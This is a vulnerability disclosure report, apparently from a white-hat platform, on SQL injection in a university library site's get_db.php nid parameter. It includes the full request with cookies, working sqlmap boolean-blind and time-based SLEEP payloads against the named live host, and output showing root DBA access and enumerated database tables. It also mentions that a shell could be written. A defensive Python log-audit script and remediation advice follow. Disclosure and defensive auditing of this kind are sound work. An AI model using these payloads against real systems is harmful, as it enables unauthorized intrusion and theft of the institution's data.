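2015-12-01: Details reported to the vendor; awaiting vendor handling
2015-12-02: Vendor confirmed; details disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and experts in related fields
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public

As the title says.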
GET /do/get_db.php?nid=3&page=1&type=fid&id_sort=13&rows=20&c=&d=&div=content&0.3172887838445604&0.3588008456863463&c=&d=&div=content&id_sort=A&nid=3*&page=1&rows=20&type=zm HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://lib.cufe.edu.cn
Cookie: cufeUSR2=cccjjtxv%090%091448790599%09http%3A%2F%2Flib.cufe.edu.cn%2Fdo%2Fget_db.php%3Fnid%3D3%26page%3D1%26type%3Dfid%26id_sort%3D13%26rows%3D20%26c%3D%26d%3D%26div%3Dcontent%260.3172887838445604; star_time=1448790311; cufestat_client_1=790947%0929%0934fe41959c661d5d3e5c5a70d52806c1; cufestat_client_uv_1=29; CNZZDATA1253322731=1532733387-1448790319-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1448790319; cod=; csd=169
Host: lib.cufe.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The nid parameter is vulnerable to SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://lib.cufe.edu.cn:80/do/get_db.php?nid=3&page=1&type=fid&id_sort=13&rows=20&c=&d=&div=content&0.3172887838445604&0.3588008456863463&c=&d=&div=content&id_sort=A&nid=3 AND 4748=4748&page=1&rows=20&type=zm

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://lib.cufe.edu.cn:80/do/get_db.php?nid=3&page=1&type=fid&id_sort=13&rows=20&c=&d=&div=content&0.3172887838445604&0.3588008456863463&c=&d=&div=content&id_sort=A&nid=3 AND (SELECT * FROM (SELECT(SLEEP(5)))YWYM)&page=1&rows=20&type=zm
---
web application technology: PHP 5.6.8, Apache 2.4.12
back-end DBMS: MySQL 5.0.12
current user: 'root@localhost'
current database: 'cufe'
current user is DBA: True
available databases [4]:
[*] cufe
[*] information_schema
[*] mysql
[*] test
[22:18:42] [INFO] fetching tables for database: 'cufe'
[22:18:42] [INFO] fetching number of tables for database 'cufe'
[22:18:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:18:42] [INFO] retrieved: 58
[22:18:57] [INFO] retrieved: ice_admin_menu
[22:21:23] [INFO] retrieved: ice_area
[22:22:08] [INFO] retrieved: ice_article
[22:23:15] [INFO] retrieved: ice_article_db
[22:24:08] [INFO] retrieved: ice_ask_cache
[22:25:41] [INFO] retrieved: ice_ask_config
[22:26:51] [INFO] retrieved: ice_ask_form
[22:27:51] [INFO] retrieved: ice_ask_form_element
[22:29:32] [INFO] retrieved: ice_ask_sor
[22:30:53] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)t
[22:31:27] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[22:31:36] [INFO] retrieved: ice_ask_student
[22:32:57] [INFO] retrieved: ice_ask_student
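DBA privileges, and on MySQL; it would be bad if a shell got written.

Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-12-02 14:38
A data issue involving the superuser.
None yet.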
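
The request in this report carries nid twice (nid=3 and the marked nid=3*), and PHP's $_GET keeps only the last occurrence of a repeated name. The following is an added example, not part of the original report or the vendor's code: a log-audit check that validates the value PHP would actually use and flags conflicting duplicates. The set of integer-only parameters and the sample URLs are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: these get_db.php parameters are only ever meant to be integers.
INT_PARAMS = {"nid", "page", "rows"}
INT_RE = re.compile(r"[0-9]{1,9}")  # ASCII digits only; \d would accept Unicode digits


def audit(url):
    """Return (param, issue, detail) findings for one request URL."""
    seen = {}
    # keep_blank_values keeps bare keys such as the cache-buster numbers
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        seen.setdefault(name, []).append(value)

    findings = []
    for name in sorted(INT_PARAMS & seen.keys()):
        values = seen[name]
        effective = values[-1]  # PHP's $_GET keeps the last occurrence of a name
        if not INT_RE.fullmatch(effective):
            findings.append((name, "non-integer", effective))
        if len(set(values)) > 1:
            findings.append((name, "conflicting-duplicates", tuple(values)))
    return findings


# Constructed sample requests modelled on the report's URL (not from a real log).
SAMPLES = [
    "/do/get_db.php?nid=3&page=1&rows=20&type=zm",
    "/do/get_db.php?nid=3&page=1&rows=20&nid=3%20AND%204748=4748&type=zm",
    "/do/get_db.php?nid=3%20AND%204748=4748&page=1&nid=3&page=1",
]


def scan(urls):
    """Map each suspicious URL to its findings; clean URLs are omitted."""
    results = {}
    for url in urls:
        findings = audit(url)
        if findings:
            results[url] = findings
    return results


if __name__ == "__main__":
    for url, findings in scan(SAMPLES).items():
        print(url)
        for finding in findings:
            print("   ", finding)
```

The same integer check belongs in the application itself, ahead of a parameterized query, with the application connecting as a non-root MySQL account so that an injection does not run with DBA rights.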